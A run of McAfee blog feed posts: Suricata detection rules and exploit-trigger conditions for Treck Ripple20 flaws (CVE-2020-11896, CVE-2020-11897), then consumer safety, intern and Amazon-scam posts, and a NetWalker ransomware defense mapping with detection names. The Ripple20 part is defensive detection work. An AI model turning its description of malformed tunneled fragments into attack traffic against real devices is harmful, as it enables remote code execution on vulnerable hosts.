The routing header type 0 was deprecated in IPv6 traffic in RFC 5095 as of December 2007. As a result, it may be feasible simply to detect packets using this criterion. False positives may be possible in this scenario for legacy devices or platforms. Suricata already provides a default rule for this scenario which has been added below. According to the RFC, routers are not supposed to fragment IPv6 packets and must support an MTU of 1280, which would always contain all of the RH0 header, unless an unusual amount of header extensions or an unusually large header is used. If this is followed, then a packet using the RH0 header should never be fragmented across the RH0 extension header bounds and any RH0 packet fragmented in this manner should be treated as potentially malicious. Treating any fragmented RH0 packet as potentially malicious may be sufficient. Furthermore, treating any fragmented RH0 packet with fragments size below a threshold as well as IPv6 packets with multiple extension headers or an unusually large header above a threshold may provide high accuracy detection.

False positive conditions (signatures detecting non-malicious traffic):

If all detection criteria outlined above are used, false positives should be minimal since the reported length of a packet should match its actual length and the next header should never contain malformed data.  If only routing header type 0 is checked, false positives are more likely to occur.  In the additional provided rule, false positives should be minimal since RH0 is deprecated and the ICMP header should never have invalid checksums or unknown codes.

False negative conditions (signatures failing to detect vulnerability/exploitation):

False negatives may occur if the signature is developed overly specific to the layer following IPv6, for example, ICMP.  An attacker could potentially leverage another layer and still exploit the vulnerability without the information leak; however, this would still trigger the default RH0 rule. In the second rule below, false negatives are likely to occur if:

  • An attacker uses a non-ICMP layer following the IPv6 layer
  • A valid ICMP code is used
  • The checksum is valid, and the payload is less than or equal to 5 bytes (this value can be tuned in the signature)

Signature(s):

Ipv6_rh0.rules:

alert ipv6 any any -> any any (msg:"SURICATA RH Type 0"; decode-event:ipv6.rh_type_0; classtype:protocol-command-decode; sid:2200093; rev:2;)

alert ipv6 any any -> any any (msg:"IPv6 RH0 Treck CVE-2020-11897"; decode-event:ipv6.rh_type_0; decode-event:icmpv6.unknown_code; icmpv6-csum:invalid; dsize:>5; sid:2020118971; rev:1;)

IPv4/UDP Tunneling Remote Code Execution

CVE: CVE-2020-11896

CVSS: 10.0
Protocol(s): IPv4/UDP
Port(s): Any

Vulnerability description:

The Treck TCP/IP stack does not properly handle incoming IPv4-in-IPv4 packets with fragmented payload data. This could lead to remote code execution when sending multiple specially crafted tunneled UDP packets to a vulnerable host.

The vulnerability is a result of an incorrect trimming operation when the advertised total IP length (in the packet header) is strictly less than the data available. When sending tunneled IPv4 packets using multiple fragments with a small total IP length value, the TCP/IP stack would execute the trimming operation. This leads to a heap overflow situation when the packet is copied to a destination packet allocated based on the smaller length. When the tunneled IPv4 packets are UDP packets sent to a listening port, there’s a possibility to trigger this exploit if the UDP receive queue is non-empty. This can result in an exploitable heap overflow situation, leading to remote code execution in the context in which the Treck TCP/IP stack runs.

Recommended detection criteria:

In order to detect an ongoing attack, the following conditions should be met if encapsulation can be unpacked:

  • The UDP receive queue must be non-empty
  • Incoming UDP packets must be fragmented
    • Flag MF = 1 with any offset, or
    • Flag MF = 0 with non-zero offset
  • Fragmented packets must have encapsulated IPv4 packet (upon assembly)
    protocol = 0x4 (IPIP)
  • Encapsulated IPv4 packet must be split across 2 packet fragments.
  • Reassembled (inner-most) IPv4 packet has incorrect data length stored in IP header.

The fourth condition above is required to activate the code-path which is vulnerable, as it spreads the data to be copied across multiple in-memory buffers. The final detection step is the source of the buffer overflow, as such, triggering on this may be sufficient.

Depending on the limitations of the network inspection device in question, a looser condition could be used, though it may be more prone to false positives.

In order to detect an ongoing attack if encapsulation cannot be unpacked:

  • The UDP receive queue must be non-empty
  • Incoming UDP packets must be fragmented
    • Flag MF = 1 with any value in offset field, or
    • Flag MF = 0 with any non-zero value in offset field
  • Final fragment has total fragment length longer than offset field.

The final condition shown above is not something that should be seen in a normal network.

Fragmentation, when it occurs, is the result of data overflowing the MTU of a given packet type. This indicates the final fragment should be no larger than any other fragment – and in practice would likely be smaller. The inverse, where the final fragment is somehow larger than previous fragments, indicates that the fragmentation is not the result of MTU overflow, but instead something else. In this case, malicious intent.

As network monitors in common usage are likely to have the ability to unpack encapsulation, only that ruleset is provided.

Limitations or special considerations for detection:

The Treck stack supports (at least) two levels of tunneling. Each tunnel level can be IPv4-in-IPv4, IPv6-in-IPv4, or IPv4-in-IPv6. The above logic is specific to the IPv4-in-IPv4, single level of tunneling case. In cases of deeper nesting, either a recursive check or a full unwrapping of all tunneling layers will be necessary.

False positive conditions (signatures detecting non-malicious traffic):

False positives should be minimal if all detection criteria outlined above are used in the case where the tunneling can be unpacked. In the case where tunneling cannot be unpacked, this is unlikely to trigger many false positives in the presence of standards compliant applications. Fragmentation as seen here is simply not common.

False negative conditions (signatures failing to detect vulnerability/exploitation):

False negatives could occur with deeper levels of nesting, or nesting of IPv6.

Signature(s):

ipv4_tunneling.rules:

alert ip any any -> any any (msg:"IPv4 TUNNELING EXPLOIT (CVE‑2020‑11896)"; ip_proto:4; lua:tunnel_length_check.lua; sid:2020118961; rev:1;)

Lua script (tunnel_length_check.Lua) can be found in Appendix A

Appendix A

Appendix A contains Lua scripts that are required for usage with corresponding Suricata signatures. These scripts are also located on McAfee ATR’s GitHub.

dns_tcp_size.lua: 

dns_size.lua: 

dns_invalid_name.lua:


dns_heap_overflow_variant_1.lua:

dns_heap_overflow_variant_2.lua:

tunnel_length_check.lua:

The post Ripple20 Critical Vulnerabilities – Detection Logic and Signatures appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ripple20-critical-vulnerabilities-detection-logic-and-signatures/feed/ 0
What Security Means to Families https://www.mcafee.com/blogs/consumer/what-security-means-to-families/ Tue, 04 Aug 2020 17:00:35 +0000 /blogs/?p=104448 digital parenting

What Security Means to Families One truth of parenting is this: we do a lot of learning on the job. And that often goes double when it comes to parenting and the internet. That’s understandable. Whereas we can often look to our own families and how we were raised for parenting guidance, today’s always-on mobile […]

The post What Security Means to Families appeared first on McAfee Blogs.

]]>
digital parenting

What Security Means to Families

One truth of parenting is this: we do a lot of learning on the job. And that often goes double when it comes to parenting and the internet.

That’s understandable. Whereas we can often look to our own families and how we were raised for parenting guidance, today’s always-on mobile internet, with tablets and smartphones almost always within arm’s reach, wasn’t part of our experience growing up. This is plenty new for nearly all of us. We’re learning on the job as it were, which is one of the many reasons why we reached out to parents around the globe to find out what their concerns and challenges are—particularly around family safety and security in this new mobile world of ours.

 Just as we want to know our children are safe as they walk to school or play with friends, we want them to be just as safe when they’re online. Particularly when we’re not around and there to look over their shoulder. The same goes for the internet. Yet where we likely have good answers for keeping our kids safe around the house and the neighborhood, answers about internet safety are sometimes harder to come by.

Recently, we conducted a survey of 600 families and professionals in the U.S. to better understand what matters to them—in terms of security and the lives they want to lead online. The following article reflects what they shared with us, and allows us to share it with you in turn, with the aim of helping you and your family stay safer and more secure. 1

What concerns and questions do parents have about the internet?

The short answer is that parents are looking for guidance and support. They’re focused on the safety of their children, and they want advice on how to parent when it comes to online privacy, safety, and screen time. Within that, they brought up several specific concerns:

Help my kids not feel anxious about growing up in an online world.

There’s plenty wrapped up in this statement. For one, it refers to the potential anxiety that revolves around social networks and the pressures that can come with using social media—how to act, what’s okay to post and what’s not, friending, following, unfriending, unfollowing, and so on—not to mention the notion of FOMO, or “fear of missing out,” and anxiety that arises from feelings of not being included in someone else’s fun.

Keep my kids safe from bullying, or bullying others.

Parents are right to be concerned. Cyberbullying happens. In a study spanning 30 countries, one child in three has said they’ve been the victim of cyberbullying according to a study conducted by UNICEF. On the flip side of that, a 2016 study of more than 5,000 students in the U.S. by the Cyberbullying Research Center reported that 11.5% of students between 12 and 17 indicated that they had engaged in cyberbullying in their lifetime.

Feel like I can leave my child alone with a device without encountering inappropriate content.

If we think of the internet as a city, it’s the biggest one there is. For all its libraries, playgrounds, movie theatres, and shopping centers, there are dark alleys and derelict lots as well. Not to mention places that are simply age appropriate for some and not for others. Just as we give our children freer rein to explore their world on their own as they get older, the same holds true for the internet. There are some things we don’t want them to see and do.

Balance the amount of screen time my children get each day.

Screen time is a mix of many things—from schoolwork and videos to games and social media. It has its benefits and its drawbacks, depending on what children are doing and how often they’re doing it. The issue often comes down to what is “too much” screen time, particularly as it relates to the bigger picture of physical activity, face-to-face time with the family, hanging out with friends, and getting a proper bedtime without the dim light of a screen throwing off their sleep rhythms.

Where can parents get started?

Beyond our job of providing online security for devices, our focus at McAfee is on protecting people. Ultimately, that’s the job we aim to do—to help you and your family be safer. Beyond creating software for staying safe, we also put together blogs and resources that help people get sharp on the security topics that matter to them. For parents, check out this page which puts forward some good guidance and advice that can help. Check it out, and we hope that you’ll find even more ways you can keep you and your family safe.

Stay Updated 

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

 

  • Survey conducted in October 2019, consisting of 600 computer-owning adults in the U.S.

 

The post What Security Means to Families appeared first on McAfee Blogs.

]]>
My Experience as a Finance Intern at McAfee for Summer 2020 https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/my-experience-as-a-finance-intern-at-mcafee-for-summer-2020/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/my-experience-as-a-finance-intern-at-mcafee-for-summer-2020/#respond Tue, 04 Aug 2020 15:33:11 +0000 /blogs/?p=104589

By: Nilisha, Finance Intern, Plano, TX, United States Amidst this global pandemic, I was fortunate enough to have the opportunity to be a Finance Intern at McAfee this summer. Working remotely was something that I never thought I would have to do so soon, however, my experience was nothing short of amazing. From the onboarding […]

The post My Experience as a Finance Intern at McAfee for Summer 2020 appeared first on McAfee Blogs.

]]>

By: Nilisha, Finance Intern, Plano, TX, United States

Amidst this global pandemic, I was fortunate enough to have the opportunity to be a Finance Intern at McAfee this summer. Working remotely was something that I never thought I would have to do so soon, however, my experience was nothing short of amazing. From the onboarding process to all of the trainings and workshops, McAfee helped make sure all of the summer interns had the most enriching experience.

As a leading-edge cybersecurity company, McAfee offers advanced security solutions to consumers, small and large businesses, enterprises, and governments. Security technologies from McAfee use a unique and predictive capability, which enables home users and businesses to stay one step ahead of the next wave of fileless attacks, viruses, malware, and other online threats.

As a Central Finance Intern, I was exposed to many different programs and softwares such as Hyperion (financial reporting), SAP (managing financials), Qlik (data discovery and analytics), and Power BI (data modeling). I worked with supportive project leads who enabled me to ask as many questions as I wanted and guided me to successfully complete my projects. My work was used on the latest company cash forecasting, and being recognized for that felt really great. Additionally, during the course of the summer, my fellow interns and I worked together to help automate some of the pre-formatting done on the “big-guy” massive Excel workbook that contained the company financials, known as the CRIB. Getting my hands on that and working with macros and VBA codesmade me realize how I was actually able to solve things on my own and reach out for help whenever I got stuck.

Some fun activities that we did to make our experience as normal as possible was a Finance Intern picnic at a park nearby the office, had a virtual coffee with the CEO, Peter Leav, a Ruins Forbidden Treasure Virtual Escape Room, and numerous Microsoft Teams calls to wind down and grasp the fact that we were lucky enough to make a long-lasting impact. Moreover, People Success, the human resources organization at McAfee, organized many workshops and virtual intern meet-ups from interns across North America. This was a great way to see what other interns were working on and how their experiences were similar and different from mine.

Overall, I found my time at McAfee to be one of the most profoundly educational and productive experiences of my career. I am extremely thankful to McAfee for their investment in me, and for providing me the opportunity to learn, develop, and grow as a member of the McAfee team this summer.

Follow @LifeAtMcAfee on Instagram and @McAfee on Twitterto see what working at McAfee is all about. Interested in a new career opportunity at McAfee? Explore Our Careers.

The post My Experience as a Finance Intern at McAfee for Summer 2020 appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/my-experience-as-a-finance-intern-at-mcafee-for-summer-2020/feed/ 0
Special Delivery: Criminals Posing as Amazon Are Out to Steal User’s Data https://www.mcafee.com/blogs/consumer/consumer-threat-notices/criminals-posing-as-amazon-are-out-to-steal-users-data/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/criminals-posing-as-amazon-are-out-to-steal-users-data/#respond Mon, 03 Aug 2020 16:49:29 +0000 /blogs/?p=104496 Working from home

One of the joys of online shopping is instant gratification – your purchases arrive on your doorstep in just a few days! Unfortunately, consumers aren’t the only ones taking advantage of this convenience – hackers are also using it to trick users into handing over money or data. Recently, AARP recounted several scams where cybercriminals posed as Amazon’s customer […]

The post Special Delivery: Criminals Posing as Amazon Are Out to Steal User’s Data appeared first on McAfee Blogs.

]]>
Working from home

One of the joys of online shopping is instant gratification – your purchases arrive on your doorstep in just a few days! Unfortunately, consumers aren’t the only ones taking advantage of this convenience – hackers are also using it to trick users into handing over money or data. Recently, AARP recounted several scams where cybercriminals posed as Amazon’s customer service or security team as a ploy to steal your personal information.  

How These Scams Work

These scams all begin with an unsuspecting user seeking help from Amazon’s customer support or their security team, only to find the contact information of a fraudster posing as the companyFor example, in one of these scamsa user called a fraudulent customer support number to help his wife get back into her account. However, the scammer behind the phone number tried to sell the victim a fake $999 computer program to prevent hacking on his own device. Thankfully, according to AARP, the man refused to send the money.  

 Another victim reported receiving an email from the “Amazon Security Team,” stating that a fraudulent charge was made on her account and that it was locked as a result. The email asked for her address and credit or debit card information to unlock her account and get a refund on the fake charge. But upon closer review, the woman noticed that the email address ended in .ng, indicating that it was coming from Nigeria. Luckily, the woman refused to send her information and reported the incident instead.   

Not all victims are as lucky. One woman received an email that looked like it was from Amazon and gave the scammers her social security number, credit card number, and access to her devices. Another victim lost $13,300 to scammers who contacted her through a messaging platform stating that someone hacked her Amazon account and that she needed to buy gift cards to restore it.  

Steer Clear of These Tricks

Many of these fraudsters are taking advantage of Amazon’s credibility to trick unsuspecting out of money and personal data. However, there are ways that users can prevent falling prey to these scams – and that all starts with staying educated on the latest schemes so consumers know what to look out for. By staying knowledgeable on the latest threats, consumers can feel more confident browsing the internet and making online purchases. Protect your digital life by following these security tips:  

Go directly to the source

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service. 

Be wary of emails asking you to act

If you receive an email or text asking you to take a specific action or provide personal details, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from accidentally downloading malicious content. Additionally, note that Amazon does not ask for personal information like bank account numbers or Social Security numbers in unsolicited emails 

Only use one credit card for online purchases

By only using one payment method for online purchases, you can keep a better eye out for fraud instead of monitoring multiple accounts for suspicious activity. 

Look out for common signs of scams

Be on the lookout for fake websites and phone numbers with Amazon’s logo. Look for misspelled words and grammatical errors in emails or other correspondence. If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t click on it, as it’s probably a phishing link that could download malicious content onto your device. It’s best to avoid interacting with the link and delete the message altogether. 

Stay updated

To stay updated on all things McAfee  and on top of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Special Delivery: Criminals Posing as Amazon Are Out to Steal User’s Data appeared first on McAfee Blogs.

]]>
https://www.mcafee.com/blogs/consumer/consumer-threat-notices/criminals-posing-as-amazon-are-out-to-steal-users-data/feed/ 0
McAfee Defender’s Blog: NetWalker https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-defenders-blog-netwalker/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-defenders-blog-netwalker/#respond Mon, 03 Aug 2020 14:00:43 +0000 /blogs/?p=103458

Building Adaptable Security Architecture Against NetWalker NetWalker Overview The NetWalker ransomware, initially known as Mailto, was first detected in August 2019. Since then, new variants were discovered throughout 2019 and the beginning of 2020, with a strong uptick noticed in March of this year. NetWalker has noticeably evolved to a more stable and robust ransomware-as-a-service […]

The post McAfee Defender’s Blog: NetWalker appeared first on McAfee Blogs.

]]>

Building Adaptable Security Architecture Against NetWalker

NetWalker Overview

The NetWalker ransomware, initially known as Mailto, was first detected in August 2019. Since then, new variants were discovered throughout 2019 and the beginning of 2020, with a strong uptick noticed in March of this year. NetWalker has noticeably evolved to a more stable and robust ransomware-as-a-service (RaaS) model, and McAfee research suggests that the malware operators are targeting and attracting a broader range of technically advanced and enterprising criminal affiliates. McAfee Advanced Threat Research (ATR) discovered a large sum of bitcoins linked to NetWalker which suggest its extortion efforts are effective and that many victims have had no option other than to succumb to its criminal demands. For more details on NetWalker, see the McAfee ATR blog here.

We do not want you to be one of those victims, so this blog is focused on how to build an adaptable security architecture to defeat this threat and, specifically, how McAfee’s portfolio delivers the capability to prevent, detect and respond to NetWalker ransomware.

Gathering Intelligence on NetWalker

As always, building adaptable defensive architecture starts with intelligence. In most organizations, the Security Operations team is responsible for threat intelligence analysis, as well as threat and incident response. The Preview of McAfee MVISION Insights is a sneak peek of some of MVISION Insights capabilities for the threat intel analyst and threat responder. The preview identifies the prevalence and severity of select top emerging threats across the globe which enables the Security Operations Center (SOC) to prioritize threat response actions and gather relevant cyber threat intelligence (CTI) associated with the threat, in this case NetWalker ransomware. The CTI is provided in the form of technical Indicators of Compromise (IOCs) as well as MITRE ATT&CK framework tactics and techniques.

As a threat intel analyst or responder, you can drill down to gather more specific information on NetWalker, such as prevalence and links to other sources of information.

As a threat intel analyst or responder, you can further drill down to gather more specific actionable intelligence on NetWalker, such as indicators of compromise and tactics/techniques aligned to the MITRE ATT&CK framework.

From MVISION Insights preview, you can see that NetWalker leverages tactics and techniques common to other ransomware attacks, such as spear phishing attachments for Initial Access, use of PowerShell for deployment, modification of Registry Keys/Startup folder for persistence and encryption of files for impact of course.

Defensive Architecture Overview

Today’s digital enterprise is a hybrid environment of on-premise systems and cloud services with multiple entry points for attacks like NetWalker. The work from home operating model forced by COVID-19 has only expanded the attack surface and increased the risk for successful ransomware attack if organizations did not adapt their security posture. Mitigating the risk of attacks like NetWalker requires a security architecture with the right controls at the device, on the network and in security operations (sec ops). The Center for Internet Security (CIS) Top 20 Cyber Security Controls provides a good guide to build that architecture. For ransomware, and NetWalker in particular, the controls must be layered throughout the enterprise. The following outlines the key security controls needed at each layer of the architecture to protect your enterprise against ransomware.

To assess your capability against NetWalker, you must match your existing controls against the attack stages we learned from the Preview of MVISION Insights. For detailed analysis on the NetWalker ransomware attack, see McAfee ATR’s blog but, for simplicity, we matched the attack stages to the MITRE ATT&CK Framework below.

Initial Access Stage Defensive Overview

According to Threat Intelligence and Research, the initial access is performed either through vulnerability exploitation or spear phishing attachments. The following chart summarizes the controls expected to have the most effect against initial stage techniques and the McAfee solutions to implement those controls where possible.

MITRE Tactic MITRE Techniques CSC Controls McAfee Capability
Initial Access Exploit Public-Facing Applications (T1190)

Tomcat, Web Logic

CSC 2 Inventory of Software Assets

CSC 3 Continuous Vulnerability Assessment

CSC 5 Secure Configuration of hardware and software

CSC 9 Limitation of Network Ports and Protocols

CSC 12 Boundary Defense

CSC 18 Application Software Security

Endpoint Security Platform 10.7, Threat Prevention, Application Control (MAC)

Network Security Platform (NSP)

Initial Access Spear Phishing Attachments (T1566.001) CSC 7 – Email and Web Browser Protection

CSC 8 – Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection,

Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

Initial Access Valid Accounts (T1078) RDP Compromised CSC 5 Secure Configuration of hardware and software

CSC 9 Limitation of Network Ports and Protocols

CSC 12 Boundary Defense

Endpoint Security Platform 10.7, Threat Prevention

As attackers can quickly change spear phishing attachments, it is important to have adaptable defenses that include user awareness training and response procedures, behavior-based malware defenses on email systems, web access and endpoint systems, and finally sec ops playbooks for early detection and response against suspicious email attachments or other phishing techniques. For more information on how McAfee can protect against suspicious email attachments, review this additional blog post.

Using valid accounts and protocols, such as for Remote Desktop Protocol, is an attack technique we have seen rise during the initial COVID-19 period. To further understand how McAfee defends against RDP as an initial access vector, as well as how the attackers are using it to deploy ransomware, please see our previous posts.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rdp-security-explained/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cybercriminals-actively-exploiting-rdp-to-target-remote-organizations/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ens-10-7-rolls-back-the-curtain-on-ransomware/

Exploitation Stage Defensive Overview

The exploitation stage is where the attacker gains access to the target system. Protection at this stage is heavily dependent on system vulnerability management, adaptable anti-malware on both end user devices and servers and security operations tools like endpoint detection and response sensors.

McAfee Endpoint Security 10.7 provides a defense in depth capability including signatures and threat intelligence to cover known bad indicators or programs.

Additionally, machine-learning and behavior-based protection reduces the attack surface against NetWalker and detects new exploitation attack techniques.

For more information on how McAfee Endpoint Security 10.7 can prevent or identify the techniques used in NetWalker, review these additional blog posts.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ens-10-7-rolls-back-the-curtain-on-ransomware/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-to-use-mcafee-atp-to-protect-against-emotet-lemonduck-and-powerminer/

The following chart summarizes the critical security controls expected to have the most effect against exploitation stage techniques and the McAfee solutions to implement those controls where possible.

MITRE Tactic MITRE Techniques CSC Controls McAfee Portfolio Mitigation
Execution PowerShell (T1059.001) PowerShell Script CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR
Execution Service Execution (T1569.002) PS Exec CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR
Execution Command and Scripting Interpreter (T1059.003)

Windows Command Shell

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR
Execution Native API (T1106) Use Windows API functions to inject DLL CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR
Execution Windows Management Instrumentation ((T1047) CSC 4 Controlled Use of Admin Privileges

CSC 5 Secure Configuration

CSC 9 Limitation of Network Ports and Protocols

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR
Persistence Registry Key – Place Value on Run Once Key (T1060) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7 Threat Prevention
Persistence Modify Registry key – Create own key (T1112) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7 Threat Prevention
Privilege Escalation Exploitation for Privilege Exploitation ((T1068) CVE-2020-0796 CSC 3 Vulnerability Management

CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Network Security Platform (CVE-2020-0796)
Privilege Escalation Exploitation for Privilege Exploitation ((T1068) CVE-2019-1458 CSC 3 Vulnerability Management

CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Network Security Platform (CVE-2019-1458); Endpoint Security Platform 10.7 (CVE-2019-1458) Threat Prevention, Application Control (MAC)
Privilege Escalation Exploitation for Privilege Exploitation ((T1068) CVE-2017-0213 CSC 3 Vulnerability Management

CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Network Security Platform (CVE-2017-0213); Endpoint Security Platform 10.7 (CVE-2017-0213) Threat Prevention, Application Control (MAC)
Privilege Escalation Exploitation for Privilege Exploitation ((T1068) CVE-2015-1701 CSC 3 Vulnerability Management

CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Network Security Platform (CVE-2015-1701); Endpoint Security Platform 10.7, Threat Prevention, Application Control (MAC)
Privilege Escalation Process Injection: Reflective DLL (T1055) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR
Defensive Evasion Disabling Security Tools (T1562.001) ESET, Trend Micro, MS CSC 5 Secure Configuration

CSC 8 Malware Defenses

Defensive Evasion Process Injection: Reflective DLL (T1055) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR
Defensive Evasion Deobfuscate/Decode Files or Information (T1140)

 

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR
Defensive Evasion Obfuscated Files or Information (T1027): PowerShell Script uses Base64 and hexadecimal encoding and XOR-encryption

 

CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR
Credential Access Credential Dumping (T1003) Mimikatz, Mimidogz, Mimikittenz, Pwdump, LaZagne, Windows Credentials CSC 4 Controlled Use of Admin Privileges

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR
Credential Access Brute Force (T1110) NL Brute CSC 4 Controlled use of admin privileges

CSC 16 Account Monitoring

Enterprise Security Manager – Log Analysis

 

Impact Stage Defensive Overview

The impact stage is where the attacker encrypts the target system, data and perhaps moves laterally to other systems on the network. Protection at this stage is heavily dependent on adaptable anti-malware on both end user devices and servers, network controls and security operation’s capability to monitor logs for anomalies in privileged access or network traffic. The following chart summarizes the controls expected to have the most effect against impact stage techniques and the McAfee solutions to implement those controls where possible.

MITRE Tactic MITRE Techniques CSC Controls McAfee Portfolio Mitigation
Discovery Network Service Scanning (T1046)

Network Scanner

CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Endpoint Security Platform 10.7, Threat Prevention, Application Control (MAC), Network Security Platform
Lateral Movement Third Party Software (T1072)

TeamViewer, Anydesk

CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Endpoint Security Platform 10.7, Threat Prevention, Network Security Platform
Lateral Movement Service Execution (T1035) PS Exec CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Endpoint Security Platform 10.7, Threat Prevention, MVISION EDR
Collection Data from Information Repositories (T1213) CSC 4 Control Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

Enterprise Security Manger – Log Collection and Analysis
Collection Data from local system (T1005) CSC 4 Control Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

Endpoint Security Platform 10.7, Threat Prevention, MVISION EDR
Collection Data from network shared drive (T1039) CSC 4 Control Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

Endpoint Security Platform 10.7, Threat Prevention, MVISION EDR
Command and Control Ingress Tool Transfer (T1105) CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Web Gateway, Network Security Platform
Impact Data Encrypted (T1486) Netwalker Ransomeware CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR, Web Gateway
Impact Inhibit System Recovery (T1490) Shadow CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR, Web Gateway

 

Hunting for NetWalker Indicators

As a threat intel analyst or hunter, you might want to quickly scan your systems for any of NetWalker indicators. Of course, you can do that manually by downloading a list of indicators and searching with available tools. However, if you have MVISION EDR, you will be able to that search right from Insights, saving precious time. Hunting the attacker can be a game of inches so every second counts. Of course, if you found infected systems or systems with indicators, you can take action to contain and start an investigation for incident response immediately from the MVISION EDR console.

Proactively Detecting NetWalker Techniques

Many of the exploit stage techniques in this attack use legitimate Windows tools or valid accounts to either exploit, avoid detection or move laterally. These techniques are not easily prevented but can be detected using MVISION EDR. As security analysts, we want to focus on suspicious techniques, such as PowerShell, used to download files…

or execute scripts…

or evade defenses…

Monitoring or Reporting on NetWalker Events

Events from McAfee Endpoint Protection and Web Gateway play a key role in NetWalker incident and threat response. McAfee ePO centralizes event collection from all managed endpoint systems. As a threat responder, you may want to create a dashboard for NetWalker-related threat events to understand current exposure. Here is a list (not exhaustive) of NetWalker-related threat events as reported by Endpoint Protection Platform Threat Prevention Module and McAfee Web Gateway.

McAfee Endpoint Threat Prevention Events
Ransom-NetW!AB8D59ABA3DC GenericRXKU-HO!E33E060DA1A5 PS/Netwalker.a Ransom-NetW!1B6A2BFA39BC
Artemis!2F96F8098A29 GenericRXKD-DA!645C720FF0EB GenericRXKD-DA!4E59FBA21C5E Ransom-NetW!A9E395E478D0
Ransom-NetW!A0BC1AFED896 PS/Netwalker.c Artemis!F5C877335920 GenericRXKD-DA!B862EBC24355
Artemis!2F96F8098A29 GenericRXKD-DA!63EB7712D7C9 RDN/Ransom GenericRXKD-DA!F0CC568491CD
Artemis!0FF0D5085F7E GenericRXKD-DA!9172586C2F87 RDN/Generic.dx Ransom-NetW!BFF6F7B3A7DB
Ransom-NetW!7B77B436360A GenericRXKD-DA!BC75859695F6 GenericRXKD-DA!FCEDEA8111AB GenericRXKD-DA!5ABF6ED342FD
PS/Netwalker.d GenericRXKD-DA!C0DDA75C6EAE GenericRXKD-DA!ADDC865F6169 GenericRXKD-DA!DBDD7A1F53AA
Artemis!1527DAF8626C GenericRXKD-DA!608AC26EA80C Ransom-NetW!3A601EE68000 GenericRXKD-DA!8102821249E1
Ransom-NetW!2E2F5FE8ABA4 GenericRXKD-DA!F957F19CD9D7 GenericRXKD-DA!3F3CC36F4298 GenericRXKD-DA!9001DFA8D69D
PS/Agent.bu GenericRXKD-DA!5F55AC3DD189 GenericRXKD-DA!18C32583A6FE GenericRXKD-DA!01F703234047
Ransom-NetW!62C71449FBAA GenericRXKD-DA!6A64553DA499 GenericRXKD-DA!0CBA10DF0C89 Artemis!50C6B1B805EC
PS/Netwalker.b GenericRXKD-DA!59B00F607A75 Artemis!BC96C744BD66 GenericRXKD-DA!DE0B8566636D
